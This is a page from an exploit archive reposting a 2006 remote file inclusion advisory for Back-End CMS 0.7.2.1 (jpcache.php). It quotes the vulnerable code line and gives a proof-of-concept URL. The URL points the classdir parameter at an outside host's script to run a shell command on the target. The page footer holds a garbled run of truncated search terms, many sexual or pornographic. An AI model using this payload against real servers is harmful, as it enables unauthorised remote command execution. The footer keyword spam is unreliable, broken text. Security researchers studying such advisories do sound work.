about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Back-End CMS <= 0.7.2.1 (jpcache.php) Remote Include Vulnerability




2006-06-08 Back-End CMS <= 0.7.2.1 (jpcache.php) Remote Include Vulnerability
Rated as : High Risk

# Federico Fazzi, <federico@autistici.org>
# Back-end = 0.7.2.1 (jpcache.php) Remote command execution
# 08/06/2006 1:04
# Bug:
#
# jpcache.php: line 40
#
# ---
# $includedir = $_PSL['classdir'] . "/jpcache";
# ---
#
# Proof of concept:
#
# Back-end have a default path pre-set on jpcache.php,
# and cracker can execute a remote command.
#
#
http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname
securitydot.net - 2006-06-08

Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 17:40:18 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t554t wwwsexwork ricky vall t103t how to hac Niked girl 200 /compo www.allmov www.filmxx xxxxk kapo hot-//r//n CAN-2002- t528t zoorbezan. Www.Gadist piss clips mambo Remo www.lankac ...andary Crack Data teresa www.hbejz. ww.xxl.com CMS is Fre Sex arabic www.bia2.r wu-ftp 2.6 mambo Remo www.89.co www/.sexwo 200 /compo New vidio teamspeak www.freese www.mtv.co freepornov IceWarp We tamil acct www.7cow.c www.bisex. sonsexmoth sexyveido 4pig.com sex xxl se 0212054944 sexcartoon news for c wwwsexanim sexcartoon WWW.SEX IN